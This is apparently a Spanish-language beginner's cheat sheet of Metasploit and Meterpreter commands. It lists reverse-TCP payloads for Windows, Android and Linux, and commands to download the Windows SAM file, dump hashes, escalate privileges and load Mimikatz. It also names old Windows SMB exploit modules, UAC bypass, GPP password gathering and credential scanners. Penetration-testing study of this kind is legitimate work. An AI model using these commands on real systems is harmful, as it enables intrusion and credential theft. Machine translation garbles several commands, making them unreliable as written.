Comandos de MetaSploit y cargas útiles de Meterpreter
El marco Metasploit es una de las herramientas más avanzadas y favoritas de los evaluadores de penetración e investigadores de seguridad. Fue desarrollado por HD Moore en lenguaje Perl que posteriormente en 2007 fue revisado en Ruby por completo. Con su gran éxito y demanda en investigadores de seguridad y pen-testers, en 2009, MetaSploit fue adquirida por Rapid7, una conocida empresa de investigación de seguridad. Aprenda los comandos de metasploit más utilizados en esta guía de metasploit para principiantes.
Metasploit es un conjunto de herramientas completo para probadores de penetración y piratas informáticos, ya que viene preempaquetado con todas las herramientas de prueba de penetración para piratear una máquina remota y aplicaciones web. Es una de las herramientas más avanzadas para hackers e investigadores. MetaSploit es un marco muy grande en el que cada uno de sus módulos tiene toneladas de acciones que se pueden realizar. Para que sea más fácil para los nuevos usuarios, hemos enumerado algunos de los comandos de Metasploit más comúnmente utilizados, las cargas útiles de meterpreter que puede practicar y realizar.
MetaSploit para principiantes
Hay tres tipos de comandos de Metasploit.
- Comandos básicos (Estos son los comandos de operación muy básicos como buscar, ayuda, información y salir).
- Comandos de explotación (Los comandos de explotación son los que se utilizan para verificar todas las opciones de explotación, cargas útiles y objetivos).
- Comandos de ejecución de exploits (Estos son comandos posteriores a la explotación que explotan y ejecutan diferentes operaciones en una máquina de destino).
Relacionado: Kali Linux para Android
Todos los más utilizados y Metasploit Básico, Explotar y Ejecución de exploits Los comandos para que los principiantes aprendan son:
- En primer lugar, para actualizar el marco Metasploit a su última versión. Ejecute el siguiente comando.
apt update; apt install metasploit-framework
- Para ver todas las opciones de msfconsole y metasploit, use el siguiente comando de ayuda.
msfconsole/help
- El comando de búsqueda Metasploit se usa para buscar exploits y vulnerabilidades desde msfconsole.
search
- Para ver una lista de todas las opciones de carga útil para atacar una máquina objetivo.
show options
- El siguiente comando se usa para verificar y configurar la IP de escucha y el PUERTO de la máquina HOST para configurar una IP estática y el reenvío de puertos a cualquier puerto especificado.
LHOST
LPORT
- Para ver la lista de todas las cargas útiles para un exploit.
show payloads
- Para encontrar todos los sistemas operativos vulnerables a un exploit específico.
show targets
- Para mostrar opciones y comandos avanzados para explotar.
show advanced
- El comando Mostrar codificadores devuelve todos los codificadores. Codificadores utilizados para evadir firmas IDS/IPS simples que buscan ciertos bytes de su carga útil.
show encoders
- Este comando dará una lista de generadores de Nop. Se utiliza para cambiar el patrón de un sled de NOP para evitar las firmas IDS/IPS simples de NOP común.
show nops
Comando MetaSploit y cargas útiles de Meterpreter
Carga útil de Windows Reverse Meterpreter
Dominio | Descripción |
---|---|
establecer ventanas de carga útil/meterpreter/reverse_tcp | Se utiliza para la carga útil de Windows de TCP inverso |
Carga útil de Android Meterpreter inverso
Dominio | Descripción |
---|---|
establecer carga útil android/meterpreter/reverse_tcp | Se utiliza para la carga útil de Android de TCP inverso |
Carga útil de Windows VNC Meterpreter
Dominio | Descripción |
---|---|
configurar ventanas de carga útil/vncinject/reverse_tcpset ViewOnly falso | Se utiliza para la carga útil de VNC de Windows de TCP inverso |
Carga útil de Meterpreter inversa de Linux
Dominio | Descripción |
---|---|
configurar la carga útil linux/meterpreter/reverse_tcp | Utilizado para la carga útil de Linux de TCP inverso |
Comandos Meterpreter
Consulte los comandos meterpreter más útiles y comúnmente utilizados.
Dominio | Descripción |
---|---|
subir archivo c:\\windows | Comando Meterpreter para cargar archivos en una máquina de destino con sistema operativo Windows. |
descargar c:\\windows\\reparar\\sam /tmp | Comando Meterpreter para descargar archivos desde un dispositivo de destino con sistema operativo Windows. |
ejecutar -fc:\\windows\temp\exploit.exe | Para ejecutar exploits en una máquina víctima remota. |
ejecutar -f cmd -c | Para crear un nuevo canal con cmd shell. |
PD | Muestra todos los procesos de Meterpreter. |
cáscara | Meterpreter obtiene shell en el objetivo. |
obtener sistema | Este comando meterpreter intenta la escalada de privilegios en el dispositivo de destino. |
volcado de hash | Se utiliza para volcar hashes en el sistema de destino. |
portfwd agregar –l 3389 –p 3389 –r objetivo | Comando Meterpreter para el reenvío de puertos a la máquina víctima. |
portfwd delete –l 3389 –p 3389 –r objetivo | Meterpreter elimina el reenvío de puertos. |
Exploits de MetaSploit
Explore todos los exploits de metasploit más utilizados.
Explotaciones remotas de Windows MetaSploit
Todos los exploits para atacar máquinas con sistema operativo Windows de forma remota.
Dominio | Descripción |
---|---|
use exploit/windows/smb/ms08_067_netapi | Exploit remoto para máquinas con versiones de Windows MS08_067 Windows 2k, XP, 2003 |
use exploit/windows/dcerpc/ms06_040_netapi | Exploit remoto para máquinas con versiones de Windows MS08_040 Windows NT, 2k, XP, 2003 |
usar exploit/windows/smb/ ms09_050_smb2_negotiate_func_index |
Exploit remoto para máquinas con versiones de Windows MS09_050 Windows Vista SP1/SP2 y Server 2008 (x86) |
Módulos Post-Exploit de Windows Metasploit
Dominio | Descripción |
---|---|
ejecutar post/windows/gather/win_privs | Comando Metasploit para mostrar todos los privilegios y permisos del usuario actual. |
usar post/windows/recopilar/credenciales/gpp | Este comando Metasploit toma todas las contraseñas guardadas de GPP. |
cargar mimikatz -> wdigest | Metasplit cargas Mimikatz. |
ejecute post/windows/gather/local_admin_search_enum | Busca en todas las máquinas con acceso administrativo. |
Explotaciones locales de Windows MetaSploit
Exploits para trabajar con una máquina local.
Dominio | Descripción |
---|---|
usar exploit/windows/local/bypassuac | Se utiliza para la omisión de UAC (Control de cuentas de usuario) en sistemas Windows 7. |
Módulos MetaSploit Auxiliares
Dominio | Descripción |
---|---|
use auxiliar/escáner/http/dir_scanner | Herramienta de escaneo Metasploit utilizada para escanear el directorio HTTP. |
use auxiliar/escáner/http/jboss_vulnscan | Metasploit JBOSS utilizado para el escaneo de vulnerabilidades. |
usar auxiliar/escáner/mssql/mssql_login | Herramienta Metasploit Credential Scanner utilizada para MSSQL. |
usar auxiliar/escáner/oracle/oracle_login | Escáner Metasploit utilizado para el módulo de inicio de sesión de Oracle. |
Exploits de Metasploit Powershell
Dominio | Descripción |
---|---|
use exploit/multi/script/web_delivery | Explotación de entrega de carga útil de shell de Metasploit. |
publicar/ventanas/administrar/powershell/exec_powershell | Carga el shell para apuntar y ejecutar powershell. |
use exploit/multi/http/jboss_maindeployer | Implementación de Metasploit JBOSS. |
use exploit/windows/mssql/mssql_payload | Carga útil MSSQL de Metasploit. |